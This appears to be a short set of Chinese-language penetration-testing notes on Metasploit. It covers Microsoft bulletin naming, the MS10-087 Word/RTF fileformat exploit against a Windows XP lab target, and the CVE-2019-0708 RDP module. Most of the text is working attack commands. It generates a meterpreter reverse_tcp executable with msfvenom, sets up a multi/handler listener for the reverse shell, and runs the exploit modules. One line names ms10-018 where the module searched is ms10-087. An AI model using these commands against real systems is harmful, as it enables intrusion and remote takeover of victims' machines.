ms开头是代表微软的漏洞,如ms08-067 那么08是代表2008年微软出的漏洞,067是代表08年第67个漏洞
5.1 应用软件格式渗透,利用word去渗透(MS10-087)
用到的靶机为:WinXPenSP3。
打开msfconsole
搜索下ms10-018的路径:search ms10-087。
使用这个模块:
Use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof
执行show options配置环境
MSF木马生成使用
木马生成:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.107 LPORT=4444 -f exe -o payload.exe
本地监听:
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 10.0.0.217
msf exploit(handler) > set lport 4444
msf exploit(handler) > exploit
微软3389远程漏洞CVE-2019-0708 主要win7 2008r2
执行search cve-2019-0708
进入如图命令
show options配置环境
然后运行run